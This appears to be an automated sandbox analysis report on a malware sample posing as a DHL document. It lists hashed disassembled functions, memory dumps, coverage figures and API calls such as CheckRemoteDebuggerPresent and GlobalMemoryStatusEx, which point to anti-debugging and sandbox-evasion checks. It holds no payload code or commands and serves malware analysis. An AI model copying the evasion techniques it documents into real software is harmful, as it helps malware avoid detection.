                                                • Opcode Fuzzy Hash: ad894406f3e8c6f73f255e377f33936594c689f8de1c39e6e1364a237217ae39
                                                • Instruction Fuzzy Hash: A6B1F5B1D152199FCB18CFB6D58159EFBB2BF89300F20D42AD459EB254DB35AA02CF14
                                                Function 07113D08 Relevance: .2, Instructions: 196COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60be17d07a467d90cb9f8993edff825c2e4cbb372f82fa92d37211a455018092
                                                • Instruction ID: c6f0abc588dd392f9085ab1a5dc753fb3445abf0540ae3ab919c588cfd6fe23e
                                                • Opcode Fuzzy Hash: 60be17d07a467d90cb9f8993edff825c2e4cbb372f82fa92d37211a455018092
                                                • Instruction Fuzzy Hash: 0B91E4B4A1521ACFCB08CFA9C58489EFBF2FF89310F659569D425AB364D330AA41CF51
                                                Function 07113CF8 Relevance: .2, Instructions: 196COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2705f5278cf7f061bf0e04296955e38354fd54d8687b283f72a4cb080547bc83
                                                • Instruction ID: e8a09cd6c3925faedd396659ab6a9742b1ef34c7cf1ae0f5eeec687f4eb23873
                                                • Opcode Fuzzy Hash: 2705f5278cf7f061bf0e04296955e38354fd54d8687b283f72a4cb080547bc83
                                                • Instruction Fuzzy Hash: D38104B4A1525ACFCB04CFA9C58489EFBF1FF89310F258566D425AB2A4D330EA41CF51
                                                Function 07118E40 Relevance: .2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5065c43a52608dc394b28ab3af5c89d7ded71c9dbbe7bc567b5f5843d83e684
                                                • Instruction ID: 41aa8e69fd9b55d763f7a9a02fe5f6aa619d8e621762896a037dd7ae34147760
                                                • Opcode Fuzzy Hash: d5065c43a52608dc394b28ab3af5c89d7ded71c9dbbe7bc567b5f5843d83e684
                                                • Instruction Fuzzy Hash: 6D816DB4E102598FDB14CF69C590AAEFBB6FF89304F24C1A9D418A7356D730AA41CF61
                                                Function 07115108 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f0d2679edb3c4a55d0aea268324ad3a3907723e48e0a675e5ebb7463b595ca3
                                                • Instruction ID: 54ccb99162a9db73c56308b3bc705db6ab08719475e762ce250ed41848be64bc
                                                • Opcode Fuzzy Hash: 0f0d2679edb3c4a55d0aea268324ad3a3907723e48e0a675e5ebb7463b595ca3
                                                • Instruction Fuzzy Hash: 70714CB4E15609CFCB08CFA9C9805DEFBF2FF89210F25946AD415FB264D3309A518B64
                                                Function 07115118 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c88f3b130b044245b2910f605e73fd1126435b83ab3b68abcea2aad404800497
                                                • Instruction ID: b157349ad7402e4522bb1c8b514e84cd7ba30279b9999b6fe8e1baa1fd182100
                                                • Opcode Fuzzy Hash: c88f3b130b044245b2910f605e73fd1126435b83ab3b68abcea2aad404800497
                                                • Instruction Fuzzy Hash: 007107B4E15609CFCB08CFA9C9805DEFBF2FF89310F25942AD515BB264E3349A518B64
                                                Function 06D936D7 Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bba072ce3e8460e57720775e501b9601e27a465e8ab0673db5bce221923fbd98
                                                • Instruction ID: 9ee72b99fb2a4b2172eae347d110c9cef315ad4eec74deba5e49164313c5d002
                                                • Opcode Fuzzy Hash: bba072ce3e8460e57720775e501b9601e27a465e8ab0673db5bce221923fbd98
                                                • Instruction Fuzzy Hash: A3511AB4E102198FDB14CFA9C9805AEFBF2FF89304F24856AD458AB355D7309A41CFA1
                                                Function 07113ADA Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a060b7a42d5fd6b399e506052362872540e954e6ea5ca8b2a44289f28faf821c
                                                • Instruction ID: 5dc5a0d297e9dc3690d160d84fb5d13c2ab776a83ba8a78dad527fd20cd3290e
                                                • Opcode Fuzzy Hash: a060b7a42d5fd6b399e506052362872540e954e6ea5ca8b2a44289f28faf821c
                                                • Instruction Fuzzy Hash: 3151A0B0D19249DFCB04CFA9C4415AEFFB1FF86200F54C5AAC469AB289E7349A41CF95
                                                Function 07114F00 Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f99970efc85fdc6edc6ab173c14427b691e701435dd5bc825648e97e435827f
                                                • Instruction ID: b5f79e8b15c419098204a9e3925c5433c1d98779b5608cd2c377eaf914c5aaf9
                                                • Opcode Fuzzy Hash: 4f99970efc85fdc6edc6ab173c14427b691e701435dd5bc825648e97e435827f
                                                • Instruction Fuzzy Hash: 4D4106B0E0424A9FDB08CFAAD4815EEFBF2AF89700F14C46AD415AB294D3349A418F94
                                                Function 07115398 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a25541cadcb9dfa9ece0a1b32a09a112021d8a23369ef9fe1133fa55337f6ddd
                                                • Instruction ID: 3ed4d3452a24f5936ef0e1bcddcdf6000313874139345f3e02b0d68b4e290609
                                                • Opcode Fuzzy Hash: a25541cadcb9dfa9ece0a1b32a09a112021d8a23369ef9fe1133fa55337f6ddd
                                                • Instruction Fuzzy Hash: 54413AB0E1420ADFCB48CFA9C5815EEFBF2EF89300F24C46AC404BB254E7749A518B95
                                                Function 07118348 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a04b59ae0f5b4330c0b94668011add3b0b30af83f61c05d9848a6a100ecbe91f
                                                • Instruction ID: aa5a3a15e861380069e96d46c93b75f70ba75d63e95bf62c3f8ca0d6312c3b29
                                                • Opcode Fuzzy Hash: a04b59ae0f5b4330c0b94668011add3b0b30af83f61c05d9848a6a100ecbe91f
                                                • Instruction Fuzzy Hash: D34160B0E1560ADFCB48CFA5C5416AEFBF1EF89310F24D56AC105AB294E37486428B95
                                                Function 071153A8 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9e387598aad535891bd03b0034c0bdcd165c576f7de65cf8689cf3dfdb4530f
                                                • Instruction ID: 3ad4b7ee7491f082f7ea01e8210322f218b34174631f990a50ac23a8b6b2a24a
                                                • Opcode Fuzzy Hash: f9e387598aad535891bd03b0034c0bdcd165c576f7de65cf8689cf3dfdb4530f
                                                • Instruction Fuzzy Hash: 4F412AB0E1520ADFCB48CFA9C5815AEFBF2FF89300F24C56AC405BB254E7309A518B95
                                                Function 07118358 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e1700e3dc6565f6eacb6f14ef30d6590c34054994de01f7ec8aaa0b86c2c444
                                                • Instruction ID: 1b20cc4e2e3d47702e74acd6e191c310320b04065801716d4dec2d6e35c152b1
                                                • Opcode Fuzzy Hash: 6e1700e3dc6565f6eacb6f14ef30d6590c34054994de01f7ec8aaa0b86c2c444
                                                • Instruction Fuzzy Hash: 88414BB0E1520ADFCF08CFA6C5416AEFBF1AB89310F24D46AC104BB2A4E77497418B94
                                                Function 07114F10 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1e099226bd301769c174b75c075157baaae3b5f5fdeaab869c58a4c18a93404
                                                • Instruction ID: 82d89a416547c2090e359411b12dcf62ae227e7720d41769875557fcc50d2c72
                                                • Opcode Fuzzy Hash: d1e099226bd301769c174b75c075157baaae3b5f5fdeaab869c58a4c18a93404
                                                • Instruction Fuzzy Hash: DB41D4B0E1420ADFCB48CFAAC4815EEFBF2AF89700F24C46AD415BB254D7349A418F94
                                                Function 076E4712 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 349a03bd955383cdc04371fd804659c0c54ee97b8a9ad99bbbc2942081a80f3b
                                                • Instruction ID: d4b0d48061189454eaf299cbe7412819c777a55116d21491d15cc7c21ac03553
                                                • Opcode Fuzzy Hash: 349a03bd955383cdc04371fd804659c0c54ee97b8a9ad99bbbc2942081a80f3b
                                                • Instruction Fuzzy Hash: 9931DCB1D016188BEB18CFA6C8407DEFBF6BF85300F14C16AD519AB254DB744646CF90
                                                Function 07110007 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 099e6624b97ddfb4bf4f394678ca557e497adea95ddb82a63886f781c6f1a3ad
                                                • Instruction ID: c15c1207f9a655a4294a1a6d2f68fecfb72fd9bf0aab75394fc02c9610f93386
                                                • Opcode Fuzzy Hash: 099e6624b97ddfb4bf4f394678ca557e497adea95ddb82a63886f781c6f1a3ad
                                                • Instruction Fuzzy Hash: C7311C71D097958FD70ACF679C502DABFF3AFCA210F19C0A7C448AA165DB340946CB61
                                                Function 07110040 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d65fe14754b8747463417733fbcda78e350938316b40108627ce31df8269c92
                                                • Instruction ID: 89d4fa03c867cd8f6d207a06a4cf401bb55d2110141d43f0f1f88922e6247188
                                                • Opcode Fuzzy Hash: 8d65fe14754b8747463417733fbcda78e350938316b40108627ce31df8269c92
                                                • Instruction Fuzzy Hash: 6211DAB1E006189BEB18CFABD80069EFBF7AFCD200F14C07AC918B6254EB7006568F55

                                                Execution Graph

                                                Execution Coverage:14%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:15%
                                                Total number of Nodes:20
                                                Total number of Limit Nodes:4
                                                execution_graph 23827 1177ed0 23828 1177f14 CheckRemoteDebuggerPresent 23827->23828 23829 1177f56 23828->23829 23830 11709dd 23832 117084e 23830->23832 23831 117091b 23832->23831 23834 1171380 23832->23834 23836 1171383 23834->23836 23835 11714aa 23835->23832 23836->23835 23838 1178888 23836->23838 23839 1178892 23838->23839 23840 11788ac 23839->23840 23843 68df630 23839->23843 23847 68df640 23839->23847 23840->23836 23845 68df655 23843->23845 23844 68df86a 23844->23840 23845->23844 23846 68dfc25 GlobalMemoryStatusEx GlobalMemoryStatusEx 23845->23846 23846->23845 23848 68df655 23847->23848 23849 68df86a 23848->23849 23850 68dfc25 GlobalMemoryStatusEx GlobalMemoryStatusEx 23848->23850 23849->23840 23850->23848

                                                Executed Functions

                                                Function 01177ED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 471 1177ed0-1177f54 CheckRemoteDebuggerPresent 473 1177f56-1177f5c 471->473 474 1177f5d-1177f98 471->474 473->474
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01177F47
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 02b36564334b636ce5a6002c166817229f467ac46685cb1aeebb419551491a2d
                                                • Instruction ID: 121cf4b71f7fdc2a34db4465dce129b2fc81d3eb0ea3f7574830b649fc034ae2
                                                • Opcode Fuzzy Hash: 02b36564334b636ce5a6002c166817229f467ac46685cb1aeebb419551491a2d
                                                • Instruction Fuzzy Hash: B82145B19002598FDB14CF9AD584BEEFBF4EF49210F14841AE458A3350D778A944CF61
                                                Function 068D61F0 Relevance: .8, Instructions: 822COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2d0a42d1ccd8fe2c67bb9846120d57eccc41ce3186f041280bb3970b9acad76
                                                • Instruction ID: 6101f08b8bfcc00d86c58c8ead0f4566a68342633cf2182c526e89ae32bf8b02
                                                • Opcode Fuzzy Hash: c2d0a42d1ccd8fe2c67bb9846120d57eccc41ce3186f041280bb3970b9acad76
                                                • Instruction Fuzzy Hash: A1627D34A002089FDB54DB68D594BADB7F2FF88314F148469E906DB395EB35ED81CBA0
                                                Function 068DC190 Relevance: .6, Instructions: 640COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51e1c9d4f28468e590934625bcf756d94ad797f757ec3bed578512665fcba33c
                                                • Instruction ID: 798e77f0a48d78e234ab2cf5f6b74dc1c7b3dfcf3f19ac6f45d43adc9a86549e
                                                • Opcode Fuzzy Hash: 51e1c9d4f28468e590934625bcf756d94ad797f757ec3bed578512665fcba33c
                                                • Instruction Fuzzy Hash: 2632AE34A106089FDF64DF68D981BAEB7B6FB88314F108529E505EB345DB35EC42CBA0
                                                Function 068D51E8 Relevance: .6, Instructions: 589COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6195ea33d6c2237340423dd64c5b972a686f349f62e088f1c193da473d5f225a
                                                • Instruction ID: de8d43c53ea2f07ded31a5b06ccd7f2a58a13c63d8d03d067c01ac572279b4fb
                                                • Opcode Fuzzy Hash: 6195ea33d6c2237340423dd64c5b972a686f349f62e088f1c193da473d5f225a
                                                • Instruction Fuzzy Hash: 3412C231F002149FDB64DB68C8807AEBBB2EF85314F24846AD956DB345DB74DC46CBA2
                                                Function 068DAE20 Relevance: .6, Instructions: 574COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e08dd9ead116b3c84b452dbbfb85582d7804ec6f42b1af3f80b42f4f2eb8a5dd
                                                • Instruction ID: 58465357e41bc29029aa924fb2ebbbd4d360a1de1e16787dce3f2a8105bf705e
                                                • Opcode Fuzzy Hash: e08dd9ead116b3c84b452dbbfb85582d7804ec6f42b1af3f80b42f4f2eb8a5dd
                                                • Instruction Fuzzy Hash: 142294B0E102098FEF64DF68C8807AEB7B6FB49310F258526E515EB395DA74DC81CB61
                                                Function 068D30A8 Relevance: .5, Instructions: 545COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a275933e06e464a264ea9ce20da62250937ee7d72943ca87ec84fa690ebe6b7f
                                                • Instruction ID: 3dba7733b608691625c6c189d3b5b1fe964b0389ef28e462d627646cdf656581
                                                • Opcode Fuzzy Hash: a275933e06e464a264ea9ce20da62250937ee7d72943ca87ec84fa690ebe6b7f
                                                • Instruction Fuzzy Hash: D9321D30E10759CFDB14EF79C85069DB7B2BF89300F1186AAD449A7254EF70AD85CB91
                                                Function 068D7980 Relevance: .5, Instructions: 474COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53784a33670b624ece8bc630efef7efd73b029dde3e0eca92d7a231d4657797c
                                                • Instruction ID: 7d4d140c1c252dfa727a386eba827c532dc131715046b0e0b074c9fc25a1eb65
                                                • Opcode Fuzzy Hash: 53784a33670b624ece8bc630efef7efd73b029dde3e0eca92d7a231d4657797c
                                                • Instruction Fuzzy Hash: 4F027930B002199FDB64DB68D890BAEB7E2FF84314F248529D515DB385DB75ED82CB90
                                                Function 068D47B0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 68d47b0-68d47d4 1 68d47d6-68d47d9 0->1 2 68d47db-68d47f5 1->2 3 68d47fa-68d47fd 1->3 2->3 4 68d4edc-68d4ede 3->4 5 68d4803-68d48fb 3->5 7 68d4ee5-68d4ee8 4->7 8 68d4ee0 4->8 23 68d497e-68d4985 5->23 24 68d4901-68d494e call 68d5059 5->24 7->1 9 68d4eee-68d4efb 7->9 8->7 25 68d4a09-68d4a12 23->25 26 68d498b-68d49fb 23->26 37 68d4954-68d4970 24->37 25->9 43 68d49fd 26->43 44 68d4a06 26->44 40 68d497b-68d497c 37->40 41 68d4972 37->41 40->23 41->40 43->44 44->25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq$\Oq
                                                • API String ID: 0-132346853
                                                • Opcode ID: ee7b1851609e04d2f9292498c13b5dcd69fbd87d4c3ec3ef67b3976d1626be4f
                                                • Instruction ID: ad9160502959c9a3eb3a2f571d2efb7339c5ba693594b986461bae2f05ab8bf1
                                                • Opcode Fuzzy Hash: ee7b1851609e04d2f9292498c13b5dcd69fbd87d4c3ec3ef67b3976d1626be4f
                                                • Instruction Fuzzy Hash: 52616134F002189FEB549BA9C855BAEBBF6FF88310F208429E106EB395DF758D458B51
                                                Function 068DCA18 Relevance: 2.9, Strings: 2, Instructions: 401COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 68dca18-68dca35 48 68dca37-68dca3a 47->48 49 68dca3c-68dca46 48->49 50 68dca47-68dca4a 48->50 51 68dca6d-68dca70 50->51 52 68dca4c-68dca68 50->52 53 68dca99-68dca9c 51->53 54 68dca72-68dca94 51->54 52->51 55 68dca9e-68dcaaa 53->55 56 68dcab1-68dcab4 53->56 54->53 66 68dcad9-68dcaf7 55->66 68 68dcaac 55->68 58 68dcac7-68dcac9 56->58 59 68dcab6 56->59 62 68dcacb 58->62 63 68dcad0-68dcad3 58->63 65 68dcac0-68dcac2 59->65 62->63 63->48 63->66 65->58 71 68dcafd-68dcb06 66->71 72 68dcce4-68dccee 66->72 68->56 73 68dcb0c-68dcb26 71->73 74 68dccef-68dcd27 71->74 78 68dcb2c-68dcb35 73->78 79 68dccd2-68dccde 73->79 77 68dcd29-68dcd2c 74->77 80 68dcd4d-68dcd50 77->80 81 68dcd2e-68dcd48 77->81 78->74 82 68dcb3b-68dcb66 78->82 79->71 79->72 83 68dcd72-68dcd75 80->83 84 68dcd52-68dcd6d 80->84 81->80 104 68dcb6c-68dcbc5 82->104 105 68dccc0-68dcccc 82->105 86 68dcd97-68dcd9a 83->86 87 68dcd77-68dcd92 83->87 84->83 90 68dcf1f-68dcf21 86->90 91 68dcda0-68dcdb7 86->91 87->86 93 68dcf28-68dcf2b 90->93 94 68dcf23 90->94 102 68dcdbe-68dcdcc 91->102 103 68dcdb9-68dcdbc 91->103 93->77 98 68dcf31-68dcf3b 93->98 94->93 106 68dcdd1-68dcdef 102->106 108 68dcdce 102->108 103->106 127 68dcbcb-68dcbd1 104->127 128 68dcbc7-68dcbc9 104->128 105->78 105->79 113 68dcdf9-68dcf1e call 68d61a0 106->113 114 68dcdf1-68dcdf4 106->114 108->106 114->98 129 68dcbd7-68dcbf2 127->129 128->129 135 68dcbf8-68dcbfe 129->135 136 68dcbf4-68dcbf6 129->136 137 68dcc04-68dcc12 135->137 136->137 140 68dcc14-68dcc1e 137->140 141 68dcc20 137->141 143 68dcc25-68dcc27 140->143 141->143 143->105 145 68dcc2d-68dcc2f 143->145 146 68dcc3d 145->146 147 68dcc31-68dcc3b 145->147 149 68dcc42-68dcc44 146->149 147->149 149->105 150 68dcc46-68dccb9 call 68d61a0 149->150 150->105
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Dqp
                                                • API String ID: 0-2792995931
                                                • Opcode ID: f20a18da452020de727a58816a018441e50e7c48695ecb548380cd15a2e69438
                                                • Instruction ID: 8cd57044d3eed2c7587bff50d04b4100e1906715a9049b7089ac4cbf2911be81
                                                • Opcode Fuzzy Hash: f20a18da452020de727a58816a018441e50e7c48695ecb548380cd15a2e69438
                                                • Instruction Fuzzy Hash: 1DE19B30B006048FDB55EF78D581AAEBBF6AF88314F108569E906DB355EB35ED41CBA0
                                                Function 068D47A1 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 172 68d47a1-68d47d4 174 68d47d6-68d47d9 172->174 175 68d47db-68d47f5 174->175 176 68d47fa-68d47fd 174->176 175->176 177 68d4edc-68d4ede 176->177 178 68d4803-68d48fb 176->178 180 68d4ee5-68d4ee8 177->180 181 68d4ee0 177->181 196 68d497e-68d4985 178->196 197 68d4901-68d494e call 68d5059 178->197 180->174 182 68d4eee-68d4efb 180->182 181->180 198 68d4a09-68d4a12 196->198 199 68d498b-68d49fb 196->199 210 68d4954-68d4970 197->210 198->182 216 68d49fd 199->216 217 68d4a06 199->217 213 68d497b-68d497c 210->213 214 68d4972 210->214 213->196 214->213 216->217 217->198
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq
                                                • API String ID: 0-3167736908
                                                • Opcode ID: 8e640c76d66e036c223efda28715d54e312410a78e4f793436438efbb6046715
                                                • Instruction ID: 1ac1753e8e0d8d008ea677a3d13fa85ed0ab991b6a07c33ed2c9c8a73bafa880
                                                • Opcode Fuzzy Hash: 8e640c76d66e036c223efda28715d54e312410a78e4f793436438efbb6046715
                                                • Instruction Fuzzy Hash: 15516E34F002189FDB549FA9C855BAEBBF6FF88310F208529E106EB395DA758C418B90
                                                Function 0117F3AC Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 453 117f3ac-117f3c9 456 117f3cf-117f45c GlobalMemoryStatusEx 453->456 457 117f3cb-117f3ce 453->457 460 117f465-117f48d 456->460 461 117f45e-117f464 456->461 461->460
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0117F44F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
